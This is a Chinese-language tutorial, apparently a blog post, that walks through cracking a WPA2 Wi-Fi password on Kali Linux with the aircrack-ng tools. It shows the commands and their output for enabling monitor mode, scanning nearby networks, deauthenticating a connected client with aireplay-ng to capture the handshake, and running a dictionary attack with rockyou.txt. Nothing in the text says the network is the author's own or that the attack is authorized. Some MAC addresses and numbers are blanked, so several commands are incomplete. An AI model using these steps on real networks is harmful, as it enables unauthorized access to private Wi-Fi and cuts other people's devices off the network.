1.查看网卡名称:iwconfig
有一块 名为wlan0 的无线网卡通过一下命令排除影响因素
root@jkali:~# iwconfig
lo no wireless extensions.
wlan0 IEEE 802.11 ESSID:"jlysltqx"
Mode:Managed Frequency:2.462 GHz Access Point: :6C::0A:CE:7D
Bit Rate=144.4 Mb/s Tx-Power= dBm
Retry short limit: RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Link Quality=/ Signal level=- dBm
Rx invalid nwid: Rx invalid crypt: Rx invalid frag:
Tx excessive retries: Invalid misc: Missed beacon:
2.通过一下命令排除影响因素
root@jkali:~# service network-manager stop
root@jkali:~# airmon-ng check kill
Killing these processes:
PID Name
wpa_supplicant
3.启动monitor 模式
root@jkali:~# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 iwlwifi Intel Corporation Wireless / (rev )
(mac80211 monitor mode vif enabled for \[phy0\]wlan0 on \[phy0\]wlan0mon)
(mac80211 station mode vif disabled for \[phy0\]wlan0)
4.查看是否进入了监控模式
root@jkali:~# iwconfig
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power= dBm
Retry short limit: RTS thr:off Fragment thr:off
Power Management:on
lo no wireless extensions.
5.进行抓包
root@jkali:~# airodump-ng wlan0mon
CH ][ Elapsed: s ][ -- :
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
0C:4B::0A:0A:B5 - - WPA
:6C::0A:CE:7D - WPA2 CCMP PSK jlysltqx
0C:6A:BC::AB:ED - WPA2 CCMP PSK ChinaNet-fG5b
:::C6::0C - WPA2 CCMP PSK ChinaNet-sWTz
E0:::7F:: - WPA2 CCMP PSK ChinaNet-SrPw
:1D::3B::E8 - WPA2 CCMP PSK CMCC-er99
8E:::C9::EB - WPA2 CCMP PSK Guest_53EB
:::C9::EB - WPA2 CCMP PSK Master
BC:D1::BD:F1: - WPA2 CCMP PSK ¬����
我们来抓jlysltqx,他的bssid为::6C::0A:CE:7D,ch 为 ,加密方式为wpa2
6.只抓我们要的wifi 的包
root@jkali:~/kk# airodump-ng wlan0mon --bssid 28:6C:07:0A:CE:7D -c 11 -w wpa
CH ][ Elapsed: s ][ -- :
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
:6C::0A:CE:7D - WPA2 CCMP PSK jlysltqx
BSSID STATION PWR Rate Lost Frames Probe
:6C::0A:CE:7D 3C:B6:B7:E0:4C: - 0e- 0e
:6C::0A:CE:7D :3E::2A::6A - -
7.6中未获取到握手信息,我们把其中一台设备断网,让其重连来航偶去握手信息
aireplay-ng - -a :6C::0A:CE:7D -c 3C:B6:B7:E0:4C: wlan0mon
8.重新执行6获取握手信息
root@jkali:~/kk# airodump-ng wlan0mon --bssid :6C::0A:CE:7D -c -w wpa
CH ][ Elapsed: min ][ -- : ][ WPA handshake: :6C::0A:CE:7D
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
:6C::0A:CE:7D - WPA2 CCMP PSK jlysltqx
BSSID STATION PWR Rate Lost Frames Probe
:6C::0A:CE:7D 3C:B6:B7:E0:4C: - 0e- 0e jlysltqx
:6C::0A:CE:7D :3E::2A::6A - -
9.查看抓到的包 wpa-04.cap 就是我们抓成功的包
root@jkali:~/kk# ls -lrt
总用量
-rw-r--r-- root root 1月 : wpa-.kismet.netxml
-rw-r--r-- root root 1月 : wpa-.kismet.csv
-rw-r--r-- root root 1月 : wpa-.csv
-rw-r--r-- root root 1月 : wpa-.cap
-rw-r--r-- root root 1月 : wpa-.kismet.netxml
-rw-r--r-- root root 1月 : wpa-.kismet.csv
-rw-r--r-- root root 1月 : wpa-.csv
-rw-r--r-- root root 1月 : wpa-.cap
-rw-r--r-- root root 1月 : wpa-.kismet.netxml
-rw-r--r-- root root 1月 : wpa-.kismet.csv
-rw-r--r-- root root 1月 : wpa-.csv
-rw-r--r-- root root 1月 : wpa-.cap
-rw-r--r-- root root 1月 : wpa-.kismet.netxml
-rw-r--r-- root root 1月 : wpa-.kismet.csv
-rw-r--r-- root root 1月 : wpa-.csv
-rw-r--r-- root root 1月 : wpa-.cap
10.利用字典来进行解密(若字典文件未解压,请自行解压)
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-.cap
11.破解完成后恢复网络
root@jkali:~# service network-manager start
root@jkali:~# airmon-ng stop wlan0mon
PHY Interface Driver Chipset
phy0 wlan0mon iwlwifi Intel Corporation Wireless / (rev )
(mac80211 station mode vif enabled on \[phy0\]wlan0)
(mac80211 monitor mode vif disabled for \[phy0\]wlan0mon)
手机扫一扫
移动阅读更方便
你可能感兴趣的文章